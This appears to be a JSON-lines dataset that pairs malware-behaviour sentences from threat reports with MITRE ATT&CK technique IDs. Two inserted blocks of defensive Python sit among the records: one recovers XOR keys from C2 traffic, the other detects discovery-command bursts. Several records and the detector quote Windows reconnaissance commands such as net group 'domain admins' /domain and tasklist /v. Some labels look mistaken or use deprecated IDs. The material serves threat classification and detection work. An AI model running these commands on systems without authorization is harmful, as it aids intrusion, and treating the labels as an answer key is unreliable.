{"text1":"malware can list a victim's logical drives and the type, as well the total\/free space of the fixed devices. Other malware can list a directory's contents.","labels":"['T1083']"}
|
|
{"text1":"malware can list running processes.","labels":"['T1057']"}
|
|
{"text1":"malware can use a SOAP Web service to communicate with its C2 server.","labels":"['T1102']"}
|
|
{"text1":"malware can use process hollowing to inject one of its trojans into another process.","labels":"['T1055.012']"}
|
|
{"text1":"malware communicates with its C2 server via HTTPS.","labels":"['T1071']"}
|
|
{"text1":"malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.","labels":"['T1053.005']"}
|
|
{"text1":"malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. also uses secure file deletion to delete files from the victim. Additionally, malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine.","labels":"['T1070.004']"}
|
|
{"text1":"malware encrypts C2 traffic using RC4 with a hard-coded key.","labels":"['T1573']"}
|
|
{"text1":"malware gathers data from the local victim system.","labels":"['T1005']"}
|
|
{"text1":"malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook.","labels":"['T1003']"}
|
|
{"text1":"malware gathers system information via Windows Management Instrumentation (WMI).","labels":"['T1047']"}
|
|
{"text1":"malware gathers the Address Resolution Protocol (ARP) table from the victim.","labels":"['T1016']"}
|
|
{"text1":"malware gathers the registered user and primary owner name via WMI.","labels":"['T1033']"}
|
|
{"text1":"malware gathers the victim's local IP address, MAC address, and external IP address.","labels":"['T1016']"}
|
|
{"text1":"malware has communicated with C2 servers over port 6667 (for IRC) and port 8080.","labels":"['T1043']"}
|
|
{"text1":"malware has communicated with its C2 server over ports 4443 and 3543.","labels":"['T1571']"}
|
|
{"text1":"malware has created scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"malware has obtained the victim username and sent it to the C2 server.","labels":"['T1033']"}
|
|
{"text1":"malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer\/host name to send to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.","labels":"['T1027']"}
|
|
{"text1":"malware has used HTTP and IRC for C2.","labels":"['T1071']"}
|
|
{"text1":"malware has used HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"malware has used Registry Run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt.","labels":"['T1012']"}
|
|
{"text1":"malware IndiaIndia obtains and sends to its C2 server information about the first network interface card\u2019s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.","labels":"['T1016']"}
|
|
{"text1":"malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.","labels":"['T1010']"}
|
|
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.","labels":"['T1560']"}
|
|
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server. A malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.","labels":"['T1486']"}
|
|
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.","labels":"['T1074']"}
|
|
{"text1":"malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. Another malware sample also performs exfiltration over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"malware installs itself as a service to provide persistence and SYSTEM privileges.","labels":"['T1543.003']"}
|
|
{"text1":"malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.","labels":"['T1008']"}
|
|
{"text1":"malware names itself \"svchost.exe,\" which is the name of the Windows shared service host program.","labels":"['T1036']"}
|
|
{"text1":"malware RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2. Additionally, malware RoyalDNS has used DNS for C2.","labels":"['T1071']"}
|
|
{"text1":"malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.","labels":"['T1021.002']"}
|
|
{"text1":"malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.","labels":"['T1048']"}
|
|
{"text1":"malware SierraCharlie uses RDP for propagation.","labels":"['T1021.001']"}
|
|
{"text1":"Malware used by attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).","labels":"['T1562.001']"}
|
|
{"text1":"Malware used by can run commands on the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"Malware used by is capable of capturing keystrokes.","labels":"['T1056']"}
|
|
{"text1":"Malware used by is capable of remotely deleting files from victims.","labels":"['T1070.004']"}
|
|
{"text1":"malware uses Caracachs encryption to encrypt C2 payloads.","labels":"['T1573']"}
|
|
{"text1":"malware uses cmd.exe to execute commands on victims.","labels":"['T1059']"}
|
|
{"text1":"malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.","labels":"['T1027']"}
|
|
{"text1":"malware uses PowerShell and WMI to script data collection and command execution on the victim.","labels":"['T1064']"}
|
|
{"text1":"malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.","labels":"['T1059.001']"}
|
|
{"text1":"malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.","labels":"['T1098']"}
|
|
{"text1":"malware xxmm contains a UAC bypass tool for privilege escalation.","labels":"['T1548.002']"}
|
|
{"text1":"manipulated .lnk files to gather user credentials in conjunction with .","labels":"['T1547.009']"}
|
|
{"text1":"Many samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.","labels":"['T1548.002']"}
|
|
{"text1":"Many samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.","labels":"['T1070.006']"}
|
|
{"text1":"Many strings in are obfuscated with a XOR algorithm.","labels":"['T1027']"}
|
|
{"text1":"may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.","labels":"['T1110']"}
|
|
{"text1":"may be used to exfiltrate data separate from the main command and control protocol.","labels":"['T1048']"}
|
|
{"text1":"may be used to find credentials in the Windows Registry.","labels":"['T1552.002']"}
|
|
{"text1":"may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1012']"}
|
|
{"text1":"may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1112']"}
|
|
{"text1":"may collect active network connections by running netstat -an on a victim.","labels":"['T1049']"}
|
|
{"text1":"may collect information about running processes.","labels":"['T1057']"}
|
|
{"text1":"may collect information about the system by running hostname and systeminfo on a victim.","labels":"['T1082']"}
|
|
{"text1":"may collect information about the victim's anti-virus software.","labels":"['T1518.001']"}
|
|
{"text1":"may collect network configuration data by running ipconfig \/all on a victim.","labels":"['T1016']"}
|
|
{"text1":"may collect permission group information by running net group \/domain or a series of other commands on a victim.","labels":"['T1069']"}
|
|
{"text1":"may create a file containing the results of the command cmd.exe \/c ipconfig \/all.","labels":"['T1016']"}
|
|
{"text1":"may create a file containing the results of the command cmd.exe \/c net user {Username}.","labels":"['T1087']"}
|
|
{"text1":"may create a temporary user on the system named \u201cLost_{Unique Identifier}.\u201d","labels":"['T1136']"}
|
|
{"text1":"may create a temporary user on the system named \u201cLost_{Unique Identifier}\u201d with the password \u201cpond~!@6\u201d{Unique Identifier}.\u201d","labels":"['T1136']"}
|
|
{"text1":"may enumerate user directories on a victim.","labels":"['T1083']"}
|
|
{"text1":"may gather a list of running processes by running tasklist \/v.","labels":"['T1057']"}
|
|
{"text1":"may have used the malware to move onto air-gapped networks. targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.","labels":"['T1091']"}
|
|
{"text1":"may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.","labels":"['T1036']"}
|
|
{"text1":"may store RC4 encrypted configuration information in the Windows Registry.","labels":"['T1112']"}
|
|
{"text1":"may use net group \"domain admins\" \/domain to display accounts in the \"domain admins\" permissions group and net localgroup \"administrators\" to list local system administrator group membership.","labels":"['T1087']"}
|
|
{"text1":"may use net view \/domain to display hostnames of available systems on a network.","labels":"['T1018']"}
|
|
{"text1":"may use to add local firewall rule exceptions.","labels":"['T1562.001']"}
|
|
{"text1":"may use WMI when collecting information about a victim.","labels":"['T1047']"}
|
|
{"text1":"Microsoft Sysinternals is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.","labels":"['T1569.002']"}
|
|
{"text1":"mimics a legitimate Russian program called USB Disk Security.","labels":"['T1036']"}
|
|
{"text1":"mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.","labels":"['T1036']"}
|
|
{"text1":"modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.","labels":"['T1112']"}
|
|
{"text1":"modifies the %regrun% Registry to point itself to an autostart mechanism.","labels":"['T1547.001']"}
|
|
{"text1":"modifies the time of a file as specified by the control server.","labels":"['T1070.006']"}
|
|
{"text1":"modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.","labels":"['T1070.006']"}
|
|
{"text1":"modules are written in and executed via .","labels":"['T1059.001']"}
|
|
{"text1":"Modules can be pushed to and executed by that copy data to a staging area, compress it, and XOR encrypt it.","labels":"['T1560', 'T1486', 'T1074']"}
|
|
{"text1":"monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.","labels":"['T1119']"}
|
|
{"text1":"monitors USB devices and copies files with certain extensions to a predefined directory.","labels":"['T1119']"}
|
|
{"text1":"Most of the strings in are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.","labels":"['T1027']"}
|
|
{"text1":"Most samples maintain persistence by setting the Registry Run key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","labels":"['T1547.001']"}
|
|
{"text1":"Most strings in are encrypted using 3DES and XOR and reversed.","labels":"['T1027']"}
|
|
{"text1":"moved laterally via RDP.","labels":"['T1021.001']"}
|
|
{"text1":"MSGET downloader uses a dead drop resolver to access malicious payloads.","labels":"['T1102']"}
|
|
{"text1":"named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\\microsoft\\security.","labels":"['T1036']"}
|
|
{"text1":"network loader encrypts C2 traffic with RSA and RC6.","labels":"['T1573']"}
|
|
{"text1":"network traffic can communicate over a raw socket.","labels":"['T1095']"}
|
|
{"text1":"network traffic communicates over common ports like 80, 443, or 1433.","labels":"['T1043']"}
|
|
{"text1":"Newer variants of will encode C2 communications with a custom system.","labels":"['T1001']"}
|
|
{"text1":"New services created by are made to appear like legitimate Windows services, with names such as \"Windows Management Help Service\", \"Microsoft Support\", and \"Windows Advanced Task Manager\".","labels":"['T1036']"}
|
|
{"text1":"obfuscated scripts that were used on victim machines.","labels":"['T1027']"}
|
|
{"text1":"obfuscated several scriptlets and code used on the victim\u2019s machine, including through use of XOR.","labels":"['T1027']"}
|
|
{"text1":"obfuscates C2 communication using a 1-byte XOR with the key 0xBE.","labels":"['T1573']"}
|
|
{"text1":"obfuscates C2 traffic with variable 4-byte XOR keys.","labels":"['T1573']"}
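The two entries above describe the two XOR schemes an analyst meets most often in C2 traffic: a fixed single-byte key (0xBE here) and a per-sample multi-byte key that repeats every 4 bytes. The following is an added example, not code from the original page or from any malware family it describes: it shows how both keys are recovered from captured traffic without the sample, by treating each key position as an independent single-byte XOR and scoring candidate plaintexts. The beacon text, the 4-byte key and the "id=" header are constructed assumptions; only the 0xBE key comes from the text.

```python
"""Recover single-byte and repeating 4-byte XOR keys from obfuscated C2 data.

Added example; the beacon, the 4-byte key and the 'id=' header are made up
for the demonstration. 0xBE is the single-byte key named in the text."""
from itertools import cycle

# Constructed sample beacon; no real implant produces this exact format.
BEACON = (b"id=7f3a1c host=ws-fin-07 user=jdoe os=6.1 sp=1 arch=x86 "
          b"cmd=list tasks reply=wait for next tasking; the agent reports "
          b"that the screen is locked and the user is idle, so it sleeps "
          b"for ten minutes and then checks in again")
KEY_1 = b"\xbe"                # fixed 1-byte key from the text
KEY_4 = b"\x4a\x07\xd3\x91"    # assumed per-sample 4-byte key

COMMON = set(b"etaoinshr")      # frequent English letters


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def text_score(buf: bytes) -> int:
    """Crude ASCII/English likelihood: spaces and frequent letters score
    high, other printable bytes score zero, control and high bytes negative.
    The true key maximises this; a wrong key turns spaces into punctuation
    or letters into control bytes and loses."""
    score = 0
    for b in buf:
        if b == 0x20:
            score += 4
        elif b in COMMON:
            score += 2
        elif 0x61 <= b <= 0x7A:
            score += 1
        elif 0x20 < b < 0x7F or b in b"\r\n\t":
            score += 0
        else:
            score -= 10
    return score


def best_single_key(buf: bytes) -> int:
    """Brute-force all 256 single-byte keys and keep the best-scoring one."""
    return max(range(256), key=lambda k: text_score(xor_bytes(buf, bytes([k]))))


def recover_repeating_key(cipher: bytes, key_len: int) -> bytes:
    """Statistical recovery of a repeating key: key position i is a
    single-byte XOR over the bytes it covers (i, i+n, i+2n, ...), so each
    position is solved independently. key_len=1 is the fixed-key case."""
    return bytes(best_single_key(cipher[i::key_len]) for i in range(key_len))


def recover_key_known_prefix(cipher: bytes, known: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery: when the first key_len plaintext bytes are
    predictable (a fixed protocol header), the key is cipher XOR plaintext.
    This needs no statistics and works even on a single short beacon."""
    if len(known) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    return bytes(c ^ p for c, p in zip(cipher[:key_len], known[:key_len]))


if __name__ == "__main__":
    c1 = xor_bytes(BEACON, KEY_1)
    c4 = xor_bytes(BEACON, KEY_4)
    print("1-byte key: 0x%02x" % recover_repeating_key(c1, 1)[0])
    print("4-byte key (statistical):", recover_repeating_key(c4, 4).hex())
    print("4-byte key (known 'id=7' header):",
          recover_key_known_prefix(c4, b"id=7", 4).hex())
    print(xor_bytes(c4, recover_repeating_key(c4, 4)).decode())
```

The statistical path needs a few dozen bytes per key position to be reliable, so for a single short beacon the known-header path is the practical one; a repeating key that also changes per connection (the "variable" keys of the second entry) has to be recovered per session, which is why the text lists it as obfuscation rather than encryption.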
|
|
{"text1":"obfuscates files by splitting strings into smaller sub-strings and including \"garbage\" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.","labels":"['T1027']"}
|
|
{"text1":"obfuscates files or information to help evade defensive measures.","labels":"['T1027']"}
|
|
{"text1":"obfuscates internal strings and unpacks them at startup.","labels":"['T1027']"}
|
|
{"text1":"obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.","labels":"['T1027']"}
|
|
{"text1":"obfuscates strings using a custom stream cipher.","labels":"['T1027']"}
|
|
{"text1":"obtained OS version and hardware configuration from a victim.","labels":"['T1082']"}
|
|
{"text1":"obtains additional code to execute on the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"obtains a list of running processes.","labels":"['T1057']"}
|
|
{"text1":"obtains a list of running processes on the victim.","labels":"['T1057']"}
|
|
{"text1":"obtains a list of running processes through WMI querying and the ps command.","labels":"['T1057']"}
|
|
{"text1":"obtains and saves information about victim network interfaces and addresses.","labels":"['T1049']"}
|
|
{"text1":"obtains application window titles and then determines which windows to act on.","labels":"['T1010']"}
|
|
{"text1":"obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.","labels":"['T1083']"}
|
|
{"text1":"obtains the current user's security identifier.","labels":"['T1033']"}
|
|
{"text1":"obtains the IP address from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"obtains the number of removable drives from the victim.","labels":"['T1120']"}
|
|
{"text1":"obtains the system time and will only activate if it is greater than a preset date.","labels":"['T1124']"}
|
|
{"text1":"obtains the victim's current time.","labels":"['T1124']"}
|
|
{"text1":"obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"obtains the victim computer name and encrypts the information to send over its C2 channel.","labels":"['T1082']"}
|
|
{"text1":"obtains the victim IP address.","labels":"['T1016']"}
|
|
{"text1":"obtains the victim username.","labels":"['T1033']"}
|
|
{"text1":"obtains the victim username and encrypts the information to send over its C2 channel.","labels":"['T1033']"}
|
|
{"text1":"obtains Windows logon password details.","labels":"['T1003']"}
|
|
{"text1":"Once a removable media device is inserted back into the first victim, collects data from it that was exfiltrated from a second victim.","labels":"['T1025']"}
|
|
{"text1":"Once has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.","labels":"['T1112']"}
|
|
{"text1":"One persistence mechanism used by is to register itself as a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"One persistence mechanism used by is to register itself as a Windows service.","labels":"['T1543.003']"}
|
|
{"text1":"One variant of creates a new service using either a hard-coded or randomly generated name.","labels":"['T1543.003']"}
|
|
{"text1":"One variant of uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.","labels":"['T1102']"}
|
|
{"text1":"One variant of uses HTTP and HTTPS for C2.","labels":"['T1071']"}
|
|
{"text1":"One version of consists of VBScript and PowerShell scripts. The malware also uses batch scripting.","labels":"['T1064']"}
|
|
{"text1":"One version of uses a PowerShell script.","labels":"['T1059.001']"}
|
|
{"text1":"opens a backdoor on TCP ports 6868 and 7777.","labels":"['T1571']"}
|
|
{"text1":"opens a remote shell to execute commands on the infected system.","labels":"['T1059']"}
|
|
{"text1":"opens the Windows Firewall to modify incoming connections.","labels":"['T1562.001']"}
|
|
{"text1":"operates over ports 21 and 20.","labels":"['T1043']"}
|
|
{"text1":"packs a plugin with UPX.","labels":"['T1027.002']"}
|
|
{"text1":"parses the export tables of system DLLs to locate and call various Windows API functions.","labels":"['T1106']"}
|
|
{"text1":"Part of 's operation involved using modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.","labels":"['T1091']"}
|
|
{"text1":"Password stealer and NTLM stealer modules in harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication. has also executed for further victim penetration.","labels":"['T1003']"}
|
|
{"text1":"payloads are obfuscated prior to compilation to inhibit analysis and\/or reverse engineering.","labels":"['T1027']"}
|
|
{"text1":"payloads download additional files from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"performed a watering hole attack on forbes.com in 2014 to compromise targets.","labels":"['T1189']"}
|
|
{"text1":"performs account discovery using commands such as net localgroup administrators and net group \"REDACTED\" \/domain on specific permissions groups.","labels":"['T1087']"}
|
|
{"text1":"performs a reflective DLL injection using a given pid.","labels":"['T1055']"}
|
|
{"text1":"performs BIOS modification and can download and execute a file as well as protect itself from removal.","labels":"['T1542.001']"}
|
|
{"text1":"performs data exfiltration through the following command-line command: from <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt.","labels":"['T1020']"}
|
|
{"text1":"performs data exfiltration over the control server channel using a custom protocol.","labels":"['T1041']"}
|
|
{"text1":"performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.","labels":"['T1113']"}
|
|
{"text1":"performs local network connection discovery using netstat.","labels":"['T1049']"}
|
|
{"text1":"performs most of its operations using Windows Script Host (Jscript and VBScript) and runs arbitrary shellcode.","labels":"['T1064']"}
|
|
{"text1":"performs multiple process injections to hijack system processes and execute malicious code.","labels":"['T1055']"}
|
|
{"text1":"performs operating system information discovery using systeminfo.","labels":"['T1082']"}
|
|
{"text1":"performs service discovery using net start commands.","labels":"['T1007']"}
|
|
{"text1":"performs several anti-VM and sandbox checks on the victim's machine.","labels":"['T1518.001']"}
|
|
{"text1":"performs the tasklist command to list running processes.","labels":"['T1057']"}
|
|
{"text1":"performs thread execution hijacking to inject its orchestrator into a running thread from a remote process. performs a separate injection of its communication module into an Internet accessible process through which it performs C2.","labels":"['T1055']"}
|
|
{"text1":"performs timestomping of a CAB file it creates.","labels":"['T1070.006']"}
|
|
{"text1":"performs UAC bypass.","labels":"['T1548.002']"}
|
|
{"text1":"persists via a Launch Agent.","labels":"['T1543.001']"}
|
|
{"text1":"persists via a login item.","labels":"['T1547.015']"}
|
|
{"text1":"probes the system to check for sandbox\/virtualized environments and other antimalware processes.","labels":"['T1518.001']"}
|
|
{"text1":"prompts the user for their credentials.","labels":"['T1056']"}
|
|
{"text1":"prompts users for their credentials.","labels":"['T1056']"}
|
|
{"text1":"provides access to the system via SSH or any other protocol that uses PAM to authenticate.","labels":"['T1071']"}
|
|
{"text1":"provides access to the Windows Registry, which can be used to gather information.","labels":"['T1012']"}
|
|
{"text1":"provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.","labels":"['T1059']"}
|
|
{"text1":"provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.","labels":"['T1205.001']"}
|
|
{"text1":"provides a reverse shell that is triggered upon receipt of a packet with a special string, sent to any port.","labels":"['T1205.001']"}
|
|
{"text1":"provides a reverse shell on the victim.","labels":"['T1059']"}
|
|
{"text1":"puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.","labels":"['T1036.006']"}
|
|
{"text1":"queries Registry keys in preparation for setting Run keys to achieve persistence.","labels":"['T1012']"}
|
|
{"text1":"queries several Registry keys to identify hard disk partitions to overwrite.","labels":"['T1012']"}
|
|
{"text1":"queries the Registry for specific keys for potential privilege escalation and proxy information.","labels":"['T1012']"}
|
|
{"text1":"queries the Registry to determine the correct Startup path to use for persistence.","labels":"['T1012']"}
|
|
{"text1":"ran a command to compile an archive of file types of interest from the victim user's directories.","labels":"['T1005', 'T1119']"}
|
|
{"text1":"ran a reverse shell with Meterpreter.","labels":"['T1059']"}
|
|
{"text1":"ran genuinely-signed executables from Symantec and McAfee which loaded a malicious DLL called rastls.dll.","labels":"['T1574.002']"}
|
|
{"text1":"RAT is able to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"RAT is able to list processes.","labels":"['T1057']"}
|
|
{"text1":"RAT is able to open a command shell.","labels":"['T1059']"}
|
|
{"text1":"RAT is able to wipe event logs.","labels":"['T1070']"}
|
|
{"text1":"recursively generates a list of files within a directory and sends them back to the control server.","labels":"['T1119']"}
|
|
{"text1":"registers itself as a service by adding several Registry keys.","labels":"['T1543.003']"}
|
|
{"text1":"registers itself as a service on the victim\u2019s machine to run as a standalone process.","labels":"['T1569.002']"}
|
|
{"text1":"registers itself under a Registry Run key with the name \"USB Disk Security.\"","labels":"['T1547.001']"}
|
|
{"text1":"relays traffic between a C2 server and a victim.","labels":"['T1090']"}
|
|
{"text1":"removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection.","labels":"['T1070.004']"}
|
|
{"text1":"removes logs from \/var\/logs and \/Library\/logs.","labels":"['T1070']"}
|
|
{"text1":"renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036']"}
|
|
{"text1":"replaces the Sticky Keys binary C:\\Windows\\System32\\sethc.exe for persistence.","labels":"['T1546.008']"}
|
|
{"text1":"reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
|
|
{"text1":"Rundll32.exe is used as a way of executing at the command-line.","labels":"['T1218.011']"}
|
|
{"text1":"runs cmd.exe \/c and sends the output to its C2.","labels":"['T1059']"}
|
|
{"text1":"runs ipconfig \/all and collects the domain name.","labels":"['T1016']"}
|
|
{"text1":"runs its core DLL file using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"runs tasklist to obtain running processes.","labels":"['T1057']"}
|
|
{"text1":"runs tests to determine the privilege level of the compromised user.","labels":"['T1033']"}
|
|
{"text1":"runs the command: net start >> %TEMP%\\info.dat on a victim.","labels":"['T1007']"}
|
|
{"text1":"runs the command net user on a victim. also runs tests to determine the privilege level of the compromised user.","labels":"['T1087']"}
|
|
{"text1":"runs the ifconfig command to obtain the IP address from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"runs the net view \/domain and net view commands.","labels":"['T1018']"}
|
|
{"text1":"runs the net view command.","labels":"['T1018']"}
|
|
{"text1":"runs the whoami and query user commands.","labels":"['T1033']"}
|
|
{"text1":"runs whoami on the victim\u2019s machine.","labels":"['T1033']"}
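Many of the entries above (net user, net group "domain admins" /domain, net view /domain, tasklist /v, net start >> %TEMP%\info.dat, ipconfig /all, systeminfo, netstat -an, whoami, query user) are individually unremarkable administrator commands; what distinguishes post-compromise discovery is the burst of several of them from one host within seconds. The following is an added detection example, not code from the page or from any vendor product: it classifies process command lines against the discovery commands named in these entries, using the technique IDs the entries carry, and alerts when a host runs four or more distinct techniques inside a sliding 60-second window. The event records, host names and the cmd.exe /c wrapper handling are constructed assumptions.

```python
"""Detect discovery-command bursts in process-creation events.

Added example. EVENTS is a constructed log (timestamp, host, user, parent,
command line); the regexes and thresholds are this example's choices."""
from __future__ import annotations
import re
from datetime import datetime, timedelta

# (regex on the normalised command line, ATT&CK technique ID used by the entries)
DISCOVERY = [
    (r"^(whoami|query user)\b", "T1033"),
    (r"^net user\b", "T1087"),
    (r"^net (group|localgroup)\b", "T1069"),
    (r"^net view\b", "T1018"),
    (r"^tasklist\b", "T1057"),
    (r"^net start\b", "T1007"),
    (r"^ipconfig\b", "T1016"),
    (r"^(systeminfo|hostname)\b", "T1082"),
    (r"^netstat\b", "T1049"),
]
_PATTERNS = [(re.compile(rx), tid) for rx, tid in DISCOVERY]
# Strips an optional quoted/pathed 'cmd.exe /c' or '/k' wrapper (assumed format).
_SHELL_PREFIX = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+')

# Constructed sample events: one host runs a discovery burst, another shows
# isolated admin use of the same tools hours apart.
EVENTS = [
    ("2024-03-04T10:00:01", "ws-fin-07", "jdoe", "cmd.exe", "whoami"),
    ("2024-03-04T10:00:03", "ws-fin-07", "jdoe", "cmd.exe", "net user"),
    ("2024-03-04T10:00:05", "ws-fin-07", "jdoe", "cmd.exe", 'net group "domain admins" /domain'),
    ("2024-03-04T10:00:07", "ws-fin-07", "jdoe", "cmd.exe", "net view /domain"),
    ("2024-03-04T10:00:09", "ws-fin-07", "jdoe", "cmd.exe", "tasklist /v"),
    ("2024-03-04T10:00:11", "ws-fin-07", "jdoe", "cmd.exe", r"net start >> %TEMP%\info.dat"),
    ("2024-03-04T10:00:13", "ws-fin-07", "jdoe", "cmd.exe", "cmd.exe /c ipconfig /all"),
    ("2024-03-04T10:00:15", "ws-fin-07", "jdoe", "cmd.exe", "systeminfo"),
    ("2024-03-04T10:00:17", "ws-fin-07", "jdoe", "cmd.exe", "netstat -an"),
    ("2024-03-04T11:30:00", "ws-hr-02", "helpdesk", "explorer.exe", "ipconfig /all"),
    ("2024-03-04T14:05:00", "ws-hr-02", "helpdesk", "cmd.exe", "whoami"),
    ("2024-03-04T14:06:00", "ws-hr-02", "helpdesk", "cmd.exe", "notepad.exe report.txt"),
]


def normalise(cmdline: str) -> str:
    """Lower-case, collapse whitespace and drop a leading cmd.exe /c wrapper,
    so 'cmd.exe /c ipconfig /all' and 'ipconfig /all' classify alike."""
    cl = re.sub(r"\s+", " ", cmdline.strip().lower())
    return _SHELL_PREFIX.sub("", cl)


def classify(cmdline: str) -> str | None:
    """Return the discovery technique ID for a command line, or None."""
    cl = normalise(cmdline)
    for rx, tid in _PATTERNS:
        if rx.search(cl):
            return tid
    return None


def find_discovery_bursts(events, window=timedelta(seconds=60), min_techniques=4):
    """Flag hosts running >= min_techniques distinct discovery techniques
    inside one sliding window. Returns (host, user, window start, techniques)."""
    per_host: dict[str, list] = {}
    for ts, host, user, _parent, cmdline in events:
        tid = classify(cmdline)
        if tid:
            per_host.setdefault(host, []).append((datetime.fromisoformat(ts), user, tid))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, user, _) in enumerate(hits):
            in_win = {tid for t, _, tid in hits[i:] if t - t0 <= window}
            if len(in_win) >= min_techniques:
                alerts.append((host, user, t0.isoformat(), sorted(in_win)))
                break  # one alert per host is enough here
    return alerts


if __name__ == "__main__":
    for alert in find_discovery_bursts(EVENTS):
        print(alert)
```

The threshold of four distinct techniques in a minute is a starting point to tune against local admin behaviour; the classifier is deliberately keyed on the executable name after wrapper removal, because the entries show the same commands appearing both bare and behind cmd.exe /c, and the redirection in net start >> %TEMP%\info.dat is itself a staging indicator (T1074) worth a separate rule.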
|
|
{"text1":"samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32.","labels":"['T1546.015']"}
|
|
{"text1":"samples have been signed with code-signing certificates.","labels":"['T1553.002']"}
|
|
{"text1":"samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.","labels":"['T1553.002']"}
|
|
